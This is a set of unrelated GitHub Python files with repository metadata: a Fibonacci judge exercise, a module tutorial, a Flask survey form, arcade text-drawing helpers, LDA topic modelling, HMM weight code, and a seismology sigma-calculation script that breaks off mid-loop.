b82aecdb000493caac1d2ceb3d8395e7b3d8dfee | 665f790f21cd557b0fea2bc95485279c170bf022 | /1029.py | c8b0b6848ee17587c213521a23484c69ab27ed97 | [] | no_license | GustavoFelici/URI | 6340216052391bb1e907390d25cfa45a77cd7123 | 3d725c59a875e38a2efc392b8ac6a90e8cbc15e9 | refs/heads/master | 2022-11-18T07:34:54.409603 | 2020-07-21T17:16:08 | 2020-07-21T17:16:08 | 279,670,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | def fibonacci(n):
global cont
cont += 1
if n <= 1:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
n = int(input())
for i in range(n):
x = int(input())
cont = 0
resu = fibonacci(x)
print('fib({}) = {} calls = {}'.format(x, cont-1, resu))
#Time limited | [
"noreply@github.com"
] | noreply@github.com |
53dde5e6a5ba9a3e8b6c98645afbdb2cc20b2cc3 | c98bfa980a5a9ada52702aca21538bdca9141815 | /course_14/modularization.py | f7e8b09e97a145c96c0a4d805d2271d617320e4f | [] | no_license | Borye/CSVT_Python | e8c1020f0127c6cc93a6e18a542ee2970eb394f7 | ffd7db7686c679e707a4e406fd330863fa3cb338 | refs/heads/master | 2020-05-30T02:37:41.162318 | 2015-02-06T08:47:14 | 2015-02-06T08:47:14 | 30,402,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | #coding:utf8
'''
模块是python组织代码的基本方式
python的脚本都是.py文件
一个脚本可以单独运行,也可以导入另一个脚本运行
当脚本被导入运行时,我们称其为模块
模块名就是脚本的文件名
item.py ------- import item
包
创建一个包的步骤:
1 建立一个名字为包名字的文件夹
2 在该文件夹创建一个__init__.py文件
3 根据需要在该文件夹下存放脚本文件,已编扩展及子包
import pack.m1, pack.m2, pack.m3
起文件名的时候不要跟以有模块重复
导模块会先从当前目录导,如果当前没有,就去c://python27/lib 里面找
.py 脚本文件
.pyc 编译之后的文件
.pyo 优化之后的文件
'''
import mymod
'''
mymod.jia(1, 2)
'''
import c1
t = c1.MyClass()
t.myMethod()
from c1 import MyClass # 从模块c1里面导入类MyClass
t = MyClass()
t.myMethod() | [
"boli.89123@gmail.com"
] | boli.89123@gmail.com |
668963624d3086f1b1dd35cf080200af75bf8736 | 191a7f83d964f74a2b3c7faeb4fc47d9c63d521f | /.history/main_20210523152045.py | 6d7861a88a7d86a28f1d8d675b4416ba674fb3c2 | [] | no_license | AndreLiu1225/Kinder-Values-Survey | 2a317feee8d5b17c27da2b2116742656e35d8ab9 | 090c27da0c822abb7dfc0ec6e13ae1b3dcb7bbf3 | refs/heads/master | 2023-05-03T00:26:00.481423 | 2021-06-04T03:24:19 | 2021-06-04T03:24:19 | 371,989,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | from flask import Flask, render_template, redirect, url_for
from flask_wtf import FlaskForm
from wtforms import StringField, TextField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired, Email, EqualTo, Length, ValidationError
app = Flask(__name__)
app.config['SECRET_KEY'] = "0c8973c8a5e001bb0c816a7b56c84f3a"
class MCQ(FlaskForm):
    """Values survey form: demographics plus yes/no value-priority questions."""
    age = IntegerField("Please enter your age", validators=[DataRequired()])
    profession = StringField("What is your profession?", validators=[DataRequired(), Length(max=30)])
    power = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    # Fixed garbled label text ("care preservingabout tradition").
    tradition = RadioField("Do you care about preserving tradition?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    # NOTE(review): the labels below were copy-pasted from `power` and do not
    # match their field names — confirm the intended question for each value.
    achievement = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    stimulation = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    hedonism = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    conformity = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    self_direction = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
    submit = SubmitField("Submit")
if __name__ == "__main__":
    # Development server only; disable debug mode in production.
    app.run(debug=True)
| [
"andreliu2004@gmail.com"
] | andreliu2004@gmail.com |
885525dbf6209648cb4d8a7b6a68e3877d3f3342 | 58c0869520ceeb261f722976b37d2b11a4be01b0 | /source/arcade_nuke/utility.py | a17240b1e9c19d233275dce6cbe45a6fcb9f4905 | [] | no_license | buddly27/arcade-nuke | 640622af4c5b329bc43b0a4b44e6999c103aaff5 | 5478ce1b9b9932d349f45b17c87b7f2eb35ed554 | refs/heads/master | 2022-10-05T09:27:46.507448 | 2020-05-28T04:16:05 | 2020-05-28T04:16:05 | 262,652,347 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,846 | py | # :coding: utf-8
import arcade_nuke.node
def draw_game_over(x, y):
    """Create dot nodes spelling out 'Game Over.'.

    :param x: Position of the left corner of the pattern.
    :param y: Position of the top corner of the pattern.
    :return: list of the created dot nodes.
    """
    # Each inner list is one letter: (column, row) offsets of its dots.
    words = [
        [
            [
                (1, 0), (2, 0), (3, 0), (4, 0), (0, 1), (0, 2), (3, 2), (4, 2),
                (0, 3), (4, 3), (1, 4), (2, 4), (3, 4), (4, 4)
            ],
            [
                (2, 0), (1, 1), (3, 1), (0, 2), (4, 2), (0, 3), (1, 3), (2, 3),
                (3, 3), (4, 3), (0, 4), (4, 4)
            ],
            [
                (0, 0), (4, 0), (0, 1), (1, 1), (3, 1), (4, 1), (0, 2), (2, 2),
                (4, 2), (0, 3), (4, 3), (0, 4), (4, 4)
            ],
            [
                (0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (0, 1), (0, 2), (1, 2),
                (2, 2), (0, 3), (0, 4), (1, 4), (2, 4), (3, 4), (4, 4)
            ]
        ],
        [
            [
                (1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3),
                (4, 3), (1, 4), (2, 4), (3, 4)
            ],
            [
                (0, 0), (4, 0), (0, 1), (4, 1), (0, 2), (4, 2), (1, 3), (3, 3),
                (2, 4)
            ],
            [
                (0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (0, 1), (0, 2), (1, 2),
                (2, 2), (0, 3), (0, 4), (1, 4), (2, 4), (3, 4), (4, 4)
            ],
            [
                (0, 0), (1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (1, 2),
                (2, 2), (3, 2), (0, 3), (4, 3), (0, 4), (4, 4)
            ]
        ],
        [
            [
                (0, 4)
            ]
        ]
    ]

    created = []
    cursor = x
    for word in words:
        for letter in word:
            for col, row in letter:
                dot = arcade_nuke.node.DotNode(
                    x=cursor + arcade_nuke.node.DotNode.width() * col,
                    y=y + arcade_nuke.node.DotNode.height() * row,
                )
                dot.create_node()
                created.append(dot)
            # Advance past one letter cell.
            cursor += 11 * 6
        # Extra gap between words.
        cursor += 11 * 2
    return created
def draw_win(x, y):
    """Create dot nodes spelling out 'You win!'.

    :param x: Position of the left corner of the pattern.
    :param y: Position of the top corner of the pattern.
    :return: list of the created dot nodes.
    """
    # Each inner list is one letter: (column, row) offsets of its dots.
    words = [
        [
            [
                (0, 0), (4, 0), (1, 1), (3, 1), (2, 2), (2, 3), (2, 4)
            ],
            [
                (1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3),
                (4, 3), (1, 4), (2, 4), (3, 4)
            ],
            [
                (0, 0), (4, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3), (4, 3),
                (1, 4), (2, 4), (3, 4)
            ]
        ],
        [
            [
                (0, 0), (4, 0), (0, 1), (4, 1), (0, 2), (2, 2), (4, 2), (0, 3),
                (1, 3), (3, 3), (4, 3), (0, 4), (4, 4)
            ],
            [
                (1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3),
                (4, 3), (1, 4), (2, 4), (3, 4)
            ],
            [
                (0, 0), (4, 0), (0, 1), (1, 1), (4, 1), (0, 2), (2, 2), (4, 2),
                (0, 3), (3, 3), (4, 3), (0, 4), (4, 4)
            ]
        ],
        [
            [
                (0, 0), (0, 1), (0, 2), (0, 4)
            ]
        ]
    ]

    created = []
    cursor = x
    for word in words:
        for letter in word:
            for col, row in letter:
                dot = arcade_nuke.node.DotNode(
                    x=cursor + arcade_nuke.node.DotNode.width() * col,
                    y=y + arcade_nuke.node.DotNode.height() * row,
                )
                dot.create_node()
                created.append(dot)
            # Advance past one letter cell.
            cursor += 11 * 6
        # Extra gap between words.
        cursor += 11 * 2
    return created
| [
"jeremy.retailleau@gmail.com"
] | jeremy.retailleau@gmail.com |
2a6384ac94d1bb426a45a2625e3cd634028475aa | 7664a19fee5eb35f53495a8b4907a8e792606d5b | /LdaFea.py | 69cde28d31c6dc5ed1de890f38fd3408b8291ec4 | [] | no_license | starovo123/ELMoCNN | a2b5ba20318c548f55fe5f936d62d20d87f82b34 | 716d0c55455c7e8bb66343ab83240d43e189c63c | refs/heads/master | 2023-03-10T21:50:12.275197 | 2021-02-24T04:25:26 | 2021-02-24T04:25:26 | 341,778,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,104 | py | import os
import numpy as np
from gensim import corpora, models, similarities
import time
import scipy.io as scio
# import logging
# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def load_stopword():
    '''
    Load the stop-word list.

    :return: list of stop words, one per line of the file
    '''
    # Context manager guarantees the file is closed even if reading fails.
    with open('E:/Data/stopwords/en_stopwords.txt', encoding='utf-8') as f_stop:
        return [line.strip() for line in f_stop]
def create_corpusList():
    """Collect raw document texts from the first two 20-Newsgroups categories.

    :return: list of document strings
    """
    texts = []          # list of text samples
    labels_index = {}   # maps label name -> numeric id
    labels = []         # label id per document (collected but not returned)
    TEXT_DATA_DIR = 'E:/Data/20_Newsgroups/20newsgroup'
    for name in sorted(os.listdir(TEXT_DATA_DIR)):
        path = os.path.join(TEXT_DATA_DIR, name)
        if os.path.isdir(path):
            label_id = len(labels_index)
            labels_index[name] = label_id
            if label_id == 2:
                # only the first two categories are used
                break
            for fname in sorted(os.listdir(path)):
                # document files are named with digits only
                if fname.isdigit():
                    fpath = os.path.join(path, fname)
                    # context manager closes each file deterministically
                    with open(fpath, 'r', encoding='latin-1') as f:
                        texts.append(f.read().strip())
                    labels.append(label_id)
    return texts
def getLdaMatrix():
    """Train an LDA model on the corpus and return the per-document topic
    distributions as a list of arrays (one per document, topics sorted by
    descending probability)."""
    print('1.初始化停止词列表 ------')
    # start timing
    t_start = time.time()
    # load the stop-word list
    stop_words = load_stopword()
    print('2.开始读入语料数据 ------ ')
    # read in the corpus
    # create_corpusTXT()
    # f = open('E:/Code/ELMo_CNN/LdaCorpus.txt','r')
    # tokenize each document and drop stop words
    texts = create_corpusList()
    texts = [[word for word in OneText.strip().lower().split() if word not in stop_words] for OneText in texts]
    print('读入语料数据完成,用时%.3f秒' % (time.time() - t_start))
    # f.close()
    M = len(texts)
    print('文本数目:%d个' % M)
    print('3.正在建立词典 ------')
    # build the gensim dictionary (token -> id)
    dictionary = corpora.Dictionary(texts)
    V = len(dictionary)
    print('4.正在计算文本向量 ------')
    # convert each document to a bag-of-words (id, count) vector
    corpus = [dictionary.doc2bow(text) for text in texts]
    print('5.正在计算文档TF-IDF ------')
    t_start = time.time()
    # compute tf-idf weights for the corpus
    corpus_tfidf = models.TfidfModel(corpus)[corpus]
    print('建立文档TF-IDF完成,用时%.3f秒' % (time.time() - t_start))
    print('6.LDA模型拟合推断 ------')
    # train the LDA model
    num_topics = 20
    t_start = time.time()
    lda = models.LdaModel(corpus_tfidf, num_topics=num_topics, id2word=dictionary,
                          alpha=0.01, eta=0.01, minimum_probability=0.001,
                          update_every=1, chunksize=100, passes=1)
    print('LDA模型完成,训练时间为\t%.3f秒' % (time.time() - t_start))
    # matrix(1772, 20): topic distribution for each of the 1772 documents
    topic_text_matrix = []
    print('7.结果:1772个文档的主题分布:--')
    doc_topics = lda.get_document_topics(corpus_tfidf)
    idx = np.arange(M)
    for i in idx:
        topic = np.array(doc_topics[i])
        # column 1 holds the probabilities; keep at most the first 20 topics
        topic_distribute = np.array(topic[0:20,1])
        # indices of topics sorted by descending probability
        topic_idx = topic_distribute.argsort()[:-num_topics-1:-1]
        topic_text_matrix.append(topic_distribute[topic_idx])
    return topic_text_matrix
if __name__ == '__main__':
    # topic_matrix= getLdaMatrix()
    # np.save('topic_matrix.npy',topic_matrix)
    # Load the previously computed document-topic matrix from disk.
    m = np.load('topic_matrix.npy',allow_pickle=True)
    # print(m)
    # path = 'E:/Code/ELMo_CNN/lda.mat'
    # scio.savemat(path, {'text':topic_matrix})
    # print(topic_matrix[:5])
# 随机打印某10个文档的主题
# num_show_topic = 10 # 每个文档显示前几个主题
# print('7.结果:10个文档的主题分布:--')
# doc_topics = lda.get_document_topics(corpus_tfidf) # 所有文档的主题分布
# idx = np.arange(M)
# np.random.shuffle(idx)
# idx = idx[:10]
# for i in idx:
# topic = np.array(doc_topics[i])
# topic_distribute = np.array(topic[:, 1])
# # print topic_distribute
# topic_idx = topic_distribute.argsort()[:-num_show_topic - 1:-1]
# print('第%d个文档的前%d个主题:' % (i, num_show_topic)), topic_idx
# print(topic_distribute[topic_idx])
# #
# num_show_term = 10 # 每个主题显示几个词
# print('8.结果:每个主题的词分布:--')
# for topic_id in range(num_topics):
# print('主题#%d:\t' % topic_id)
# term_distribute_all = lda.get_topic_terms(topicid=topic_id)
# term_distribute = term_distribute_all[:num_show_term]
# term_distribute = np.array(term_distribute)
# term_id = term_distribute[:, 0].astype(np.int)
# print('词:\t', )
# for t in term_id:
# print(dictionary.id2token[t], )
# print('\n概率:\t', term_distribute[:, 1])
| [
"799187444@qq.com"
] | 799187444@qq.com |
968853ef76eb93ba0488bd086ea3d7f43dfc93a3 | 4abc1688699b5301df091ac3bf2605e154906cb6 | /gtnlplib/hmm.py | 317b1a53ea1cdb453b23acffcf5179a9036a3e87 | [] | no_license | fengweijp/Sequence-Labeling | b0f6f0bd5d14ebb608837c29edc59236900f5331 | 9351b43b69dc8508437971c579919e08cdda7824 | refs/heads/master | 2023-03-18T03:36:05.685216 | 2018-10-08T16:36:33 | 2018-10-08T16:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,961 | py | from gtnlplib.preproc import conll_seq_generator
from gtnlplib.constants import START_TAG, END_TAG, OFFSET, UNK
from gtnlplib import naive_bayes, most_common
import numpy as np
from collections import defaultdict
import torch
import torch.nn
from torch.autograd import Variable
def compute_transition_weights(trans_counts, smoothing):
"""
Compute the HMM transition weights, given the counts.
Don't forget to assign smoothed probabilities to transitions which
do not appear in the counts.
This will also affect your computation of the denominator.
Don't forget to assign smoothed probabilities to transitions which do not appear in the counts.
Do not assign probabilities for transitions to the START_TAG, which can only come first. This will also affect your computation of the denominator, since you are not smoothing the probability of transitions to the START_TAG.
Don't forget to assign probabilities to transitions to the END_TAG; this too will affect your denominator.
As always, probabilities should sum to one (this time conditioned on the previous tag)
:param trans_counts: counts, generated from most_common.get_tag_trans_counts
:param smoothing: additive smoothing
:returns: dict of features [(curr_tag,prev_tag)] and weights
"""
weights = defaultdict(float)
total_count = {}
for tag in trans_counts.keys():
total_count[tag] = sum(trans_counts[tag].values())
for prev_tag in trans_counts:
for curr_tag in (list(trans_counts.keys()) + [END_TAG]):
if curr_tag in trans_counts[prev_tag]:
weights[(curr_tag, prev_tag)] = np.log((trans_counts[prev_tag][curr_tag] + smoothing) / (total_count[prev_tag] + len(trans_counts) * smoothing))
else:
weights[(curr_tag, prev_tag)] = np.log(smoothing / (total_count[prev_tag] + len(trans_counts) * smoothing))
for tag in (list(trans_counts.keys()) + [END_TAG]):
weights[START_TAG, tag] = -np.inf
weights[tag, END_TAG] = -np.inf
return weights
def compute_weights_variables(nb_weights, hmm_trans_weights, vocab, word_to_ix, tag_to_ix):
    """
    Computes autograd Variables of two weights: emission probabilities and the tag transition probabilities.

    parameters:
    nb_weights: -- a dictionary of emission weights, keyed by (tag, word)
    hmm_trans_weights: -- dictionary of tag transition weights, keyed by (curr_tag, prev_tag)
    vocab: -- list of all the words
    word_to_ix: -- a dictionary that maps each word in the vocab to a unique index
    tag_to_ix: -- a dictionary that maps each tag (including the START_TAG and the END_TAG) to a unique index.
    :returns:
    emission_probs_vr: torch Variable of a matrix of size Vocab x Tagset_size
    tag_transition_probs_vr: torch Variable of a matrix of size Tagset_size x Tagset_size
    :rtype: autograd Variables of the weights
    """
    # Assume that tag_to_ix includes both START_TAG and END_TAG
    # Both matrices start at -inf (log of zero probability) by default.
    tag_transition_probs = np.full((len(tag_to_ix), len(tag_to_ix)), -np.inf)
    emission_probs = np.full((len(vocab),len(tag_to_ix)), -np.inf)
    for word in word_to_ix.keys():
        for tag in tag_to_ix.keys():
            if (tag, word) in nb_weights and word != OFFSET:
                # Copy the learned emission weight; the OFFSET pseudo-word
                # is never a real emission and is skipped.
                weight = nb_weights[tag, word]
                emission_probs[word_to_ix[word], tag_to_ix[tag]] = weight
            elif tag != START_TAG and tag != END_TAG:
                # Unseen (tag, word) pair: default log-weight of 0 for
                # ordinary tags; START/END keep -inf (they emit nothing).
                emission_probs[word_to_ix[word], tag_to_ix[tag]] = 0
    # hmm_trans_weights is keyed by (curr_tag, prev_tag) tuples.
    for tag, prev_tag in hmm_trans_weights:
        # Only the END_TAG -> START_TAG transition is left at -inf;
        # every other pair copies its learned transition weight.
        if prev_tag != END_TAG or tag != START_TAG:
            weight = hmm_trans_weights[tag, prev_tag]
            tag_transition_probs[tag_to_ix[tag], tag_to_ix[prev_tag]] = weight
    # Wrap as float32 autograd Variables (legacy pre-0.4 torch API).
    emission_probs_vr = Variable(torch.from_numpy(emission_probs.astype(np.float32)))
    tag_transition_probs_vr = Variable(torch.from_numpy(tag_transition_probs.astype(np.float32)))
    return emission_probs_vr, tag_transition_probs_vr
| [
"neilbarooah@Neils-MacBook-Pro-2.local"
] | neilbarooah@Neils-MacBook-Pro-2.local |
e6295ff4215ade162c48627668c49a52c02d301e | ba96b32c20ef78588f348c55c8e0dd2b1a8c9805 | /scripts/ModelAssemble/CalculateSigma.py | 44a018ce52df4000a85c3e297ef8875fade94a09 | [] | no_license | fengw/ABFanalysis | aa63ce70f20188c2876702072dc775b4585f7c92 | b00c61dc5f5a4055e5fce1b23dce3821257d845d | refs/heads/master | 2021-01-09T21:47:35.667108 | 2017-09-06T01:40:38 | 2017-09-06T01:40:38 | 47,899,500 | 0 | 0 | null | 2016-09-27T16:00:51 | 2015-12-13T00:00:36 | Shell | UTF-8 | Python | false | false | 16,115 | py | #!/usr/bin/env python
import os, sys
import optparse
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import time
from pyABF import *
from pynga import *
from my_util.numer import interp
tic = time.time()
# Check if we need to do the interpolation (maybe just save the uninterpolated one and let GMT do the interpolation)
# Basic parameters
# --- Command-line interface (Python 2 / optparse) ---
parser = optparse.OptionParser()
parser.add_option('-m','--model-flag', dest='mflag', type='string', help='model selection')
parser.add_option('-r','--rupture-model-id', dest='rup_model_id', type='int', nargs=4, help='rupture model specfication')
parser.add_option('-p','--period', dest='T', type='float', help='period')
parser.add_option('-S','--sigma', dest='sigma', type='string', help='parameters controling the hypocenter distribution')
parser.add_option('-G','--Gflag', dest='Gflag', type='int', help='parameters controling the absolute or residual')
#parser.add_option('-s','--source-id', dest='sid', type='int', help='SourceID' )
# example: CalculateSigma.py -m 54 -r 35 8 4 5 -p 3.00 -S 1.00_1.00 -G 0
# CyberShake Dictionary
# Maps an "(erf_id,sgt_id,rup_var_id,vel_id)" key string to the
# human-readable CyberShake study name.
CSdict = {'(35,5,3,1)':'CS11',
          '(35,7,4,1)':'CS13.1',
          '(35,7,4,4)':'CS13.2',
          '(35,8,4,8)':'CSbbp1D',
          '(35,8,4,5)':'CS14S4.26',
          '(35,6,4,7)':'CS14.2CVMH',
          '(36,8,6,5)':'CS15.4',
          }
# use in check inputs
# NOTE(review): this prints the full usage text on *every* run, not only on
# bad input -- presumably intentional as a usage reminder.
parser.print_help()
(options, args) = parser.parse_args()
sigmaMap = True # do the interpolation
mflag = options.mflag
rup_model_id = options.rup_model_id
erf_id, sgt_id, rvid, vel_id = rup_model_id
T = '%3.2f'%options.T
sigma = '%s'%options.sigma
Gflag = options.Gflag
#sid = options.sid
CSmodel = CSdict['(%s,%s,%s,%s)'%(erf_id,sgt_id,rvid,vel_id)]
# Newer studies live under ABFanalysis and use the NGA-West2 ('14') models;
# older ones live under CyberShake_analysis with NGA-West1 ('08').
if CSmodel in ['CS14S4.26', 'CS14.3CVMH', 'CS15.4', ]:
    ABFstr = 'ABFanalysis'
    ngaModel = '14'
else:
    ABFstr = 'CyberShake_analysis'
    ngaModel = '08'
wrk = '/Users/fengw/work/Project/%s'%ABFstr
# Inputs
# Directory layout of the precomputed ABF factor files (E, F, D, C, B).
mapin = '/Users/fengw/work/Project/%s/scripts/map_input/'%ABFstr
Gpth0 = mapin + 'Model_Rups%s/ERF%s_SGT%s_RupVar%s_Vel%s/Gkxmfs0/'%(mflag, erf_id, sgt_id, rvid, vel_id)
Epth = Gpth0 + 'Ekxms/Sigma%s'%(sigma)
Gpth = mapin + 'Model_Rups%s/ERF%s_SGT%s_RupVar%s_Vel%s/Gkxmfs/'%(mflag, erf_id, sgt_id, rvid, vel_id)
Fpth = Gpth + 'SFks/Sigma%s'%(sigma) # only for CyberShake (column 3)
Dpth = Gpth + 'Dkxs/Sigma%s'%(sigma)
Cpth = Gpth + 'Cks/Sigma%s'%(sigma)
Bpth = Gpth + 'Bs/Sigma%s'%(sigma)
# Output directories are created one level at a time (os.mkdir, not makedirs).
mapout0 = '/Users/fengw/work/Project/%s/scripts/map_input/'%ABFstr
mapout1 = mapout0 + 'Model_Rups%s'%mflag
mapout2 = mapout1 + '/ERF%s_SGT%s_RupVar%s_Vel%s'%(erf_id,sgt_id,rvid,vel_id )
mapout3 = mapout2 + '/Gkxmfs'
for f in [mapout0, mapout1, mapout2, mapout3,]:
    if not os.path.exists( f ):
        os.mkdir(f)
# interpolation parameters
eps = 0.001
smooth = 0.01
method = {'name':'exp','smooth':smooth}
site_locs1 = './SiteInterpMesh.txt'
sites = np.loadtxt( site_locs1 )
SiteLon1D = sites[:,0]
SiteLat1D = sites[:,1]
# read in source info
srcfile = Gpth0 + 'SourceInfo'
srids = np.loadtxt( srcfile )
sids = srids[:,0]
Areas = srids[:,1]
# read in hypocenter info
hypofile = Gpth0 + 'SourceRuptureHypoInfo'
inputs = np.loadtxt( hypofile )
sidhypo = {}
for i in xrange( inputs.shape[0] ):
    sidhypo[str(int(inputs[i,0]))] = inputs[i,2] # number of hypocenters
# source weighting function
if mflag[0] == '5':
    # Test same disaggregation condition, but different Ntop (number of sources used)
    IML = '0.3_G' # consider rock sites or choose large IML value
    Str0 = 'DisaggSources_ERF%s_'%(35)
    Str1 = 'DisaggIML_' + IML
    Str2 = '_SA_3sec.txt'
    Ntops = [5,10,15,20,25,30]
    if mflag[1] in ['1','2','3','4','5','6']:
        Ntop = Ntops[int(mflag[1])-1]
    DisaggSourceFile = wrk + '/metadata/Disaggregation/DisaggSources/UniformSiteDistribution/' + Str0 + Str1 + Str2
    # NOTE(review): this reassigns sids and defines srcPDF; for mflag not
    # starting with '5', srcPDF would be undefined further below --
    # confirm the script is always run with mflag[0] == '5'.
    sids, srcPDF = Disaggregation.GetSourceIDs(DisaggSourceFile,Ntop=Ntop)
# sigma values output path
CSmodel = CSdict['(%s,%s,%s,%s)'%(erf_id,sgt_id,rvid,vel_id)]
print 'CyberShake Model:', CSmodel
erf_id, sgt_id, rvid, vel_id = rup_model_id
soutpth = '/Users/fengw/work/Project/ABFanalysis/scripts/ModelAssemble/inputs/ABFvariances_NGA%s/%s'%(ngaModel, CSmodel)
if not os.path.exists(soutpth):
    os.mkdir(soutpth)
if Gflag:
    soutfile = soutpth + '/absolute_T%s.csv'%T
    print 'Absolute sigmas'
else:
    soutfile = soutpth + '/residual_T%s.csv'%T
    print 'Residual sigmas'
# Sigma_T after SC08 correction
# Total per-NGA-model variance: tau^2 + sigma0^2 at the requested period.
NGAmodel = ['CB','BA','CY','AS']
sigmaT = []
for nga in NGAmodel:
    SC08 = SC08_model( nga + '08' )
    ind = (np.array(SC08.periods) == float(T)).nonzero()[0]
    tau = SC08.tau[ind]
    sigma0 = SC08.sigma0[ind]
    sigmaT0 = np.sqrt( tau**2 + sigma0**2 )
    #print nga, sigma0**2, tau**2, sigmaT**2
    print nga, sigma0, tau, sigmaT0
    sigmaT.append( sigmaT0**2 ) # variance unit
# ===================
# Sigma_F
# ===================
# Rupture-variability factor variance; only CyberShake provides it.
print 'Compute sigma_U...'
sigma_F_ks = []
for isid in xrange( len(sids) ):
    sid = str(int(sids[isid]))
    AreaTmp = Areas[isid]
    Nh = int(sidhypo[sid])
    # read in Magnitude info for given sid
    Ffile = Fpth + '/' + sid + '/CyberShake.NGAs.%s.Source%s.Sfks'%(T,sid)
    inputs = np.loadtxt( Ffile )
    lons0 = inputs[:,0]
    lats0 = inputs[:,1]
    sigma_F_ks.append( inputs[:,2] ) # only CyberShake has sigma_F^2 (careful here)
sigma_F_ks = np.array(sigma_F_ks) # dimension: [Nsid, Nsta,Nmodels], type: variance
# compute the average of CyberShake
# Weighted average over sources (srcPDF) then a uniform average over sites.
pdf_s = np.repeat( 1./sigma_F_ks.shape[1], sigma_F_ks.shape[1] )
sigma_F_CS = np.average( np.average( sigma_F_ks, axis=0, weights = srcPDF ), axis=0, weights = pdf_s )
print 'sigma_F', mflag, T, rup_model_id, np.sqrt( sigma_F_CS ) # attention: printed are all sigmas and what are written in table is sigma as well
sigmaT.append(sigma_F_CS)
sigmaT.append(0) # for reference model
sigma_F = np.array(sigmaT)
print sigma_F.shape
# ===================
# Ekxms for sigma_M
# ===================
# Magnitude/source-variability factor: variance over magnitudes (weighted by
# a normal pdf around the Somerville 2006 M-A relation), averaged over
# hypocenters (beta pdf) and over sources/sites.
print 'Compute sigma_M...'
mapout4 = mapout3 + '/SEks'
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
    if not os.path.exists( f ):
        os.mkdir(f)
sigma_M_ks = []
for isid in xrange( len(sids) ):
    sid = str(int(sids[isid]))
    AreaTmp = Areas[isid]
    Nh = int(sidhypo[sid])
    # Calculate the hypocenter weighting function (pdf_x)
    xh = (np.arange( Nh )+1.0) / (Nh+1.0)
    spl = sigma.strip().split('_')
    alpha, beta = float(spl[0]), float(spl[1])
    prob0 = stats.beta.pdf(xh,alpha,beta) # use scipy.stats
    pdf_x = (prob0/sum(prob0)).tolist() # to make sure sum(prob) = 1
    # read in Magnitude info for given sid
    #Mfile = Epth + '/' + sid + '/SourceRuptureMwInfo'
    #Mws = np.loadtxt( Mfile )
    # NOTE(review): glob is not imported explicitly at the top of this
    # script; presumably it is re-exported by one of the star imports
    # (pyABF/pynga) -- verify.
    tmp_Mws = glob.glob( Epth+'/'+sid +'/M*' )
    Mws = []
    for tmp_Mw in tmp_Mws:
        spl = tmp_Mw.strip().split('/')[-1]
        Mws.append( float( spl[1:] ) )
    mu = 3.87 + np.log10(AreaTmp) * 1.05 # somerville 2006 M-A relationship
    std = 0.2
    # Mws is a plain list; the arithmetic works because mu is a numpy
    # scalar, so numpy's reflected ops convert the list to an array.
    prob0 = 1./(np.sqrt(2.*np.pi)*std) * np.exp(-0.5*((Mws-mu)/std)**2)
    pdf_m = (prob0 / sum(prob0)).tolist() # weighting should be summed up to 1
    tmp_ekxms = []
    for ihypo in xrange( Nh ):
        tmp1 = []
        for Mw in Mws:
            Mw0 = str(Mw)
            Efile = Epth + '/'+sid+'/'+'M%.2f'%Mw +'/' +'Period%s.Hypo%s.ekxms'%(T,ihypo)
            inputs = np.loadtxt( Efile )
            lons0 = inputs[:,0]
            lats0 = inputs[:,1]
            e1 = inputs[:,2:8] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
            if Gflag:
                # absolute
                ekxms0 = np.zeros( e1.shape )
                ekxms0 = -( e1[:,:6]-e1[:,4:5] ) # NGA and Ref
                ekxms0[:,4:5] = e1[:,4:5] # CS
            else:
                ekxms0 = e1
            tmp1.append( ekxms0 )
        tmp_ekxms.append( tmp1 )
    tmp_ekxms = np.array( tmp_ekxms ) # [Nhypo, NMw, Nsta, Nmodels]
    # standard deviation and average over hypocenters
    tmp_sd_xs = np.sqrt( np.average( tmp_ekxms**2, axis=1,weights=pdf_m) )
    tmp_sd0 = np.average( tmp_sd_xs, axis=0, weights = pdf_x )
    tmp_vd0 = np.average( tmp_sd_xs**2, axis=0, weights = pdf_x )
    if sigmaMap:
        # Interpolate both sigma and variance maps onto the site mesh.
        tmp_sd = []; tmp_vd = []
        for imodel in xrange( tmp_sd0.shape[1] ):
            NewValue = interp( lons0, lats0, tmp_sd0[:,imodel], SiteLon1D, SiteLat1D, eps=eps, method=method )
            tmp_sd.append( NewValue )
            NewValue = interp( lons0, lats0, tmp_vd0[:,imodel], SiteLon1D, SiteLat1D, eps=eps, method=method )
            tmp_vd.append( NewValue )
        sigma_M_ks.append( tmp_vd ) # variance unit
        pafile = mapout + '/CyberShake.NGAs.%s.Source%s.Seks'%(T,sid)
        fid = open( pafile, 'w' )
        Nrow = len(SiteLon1D)
        for irow in xrange( Nrow ):
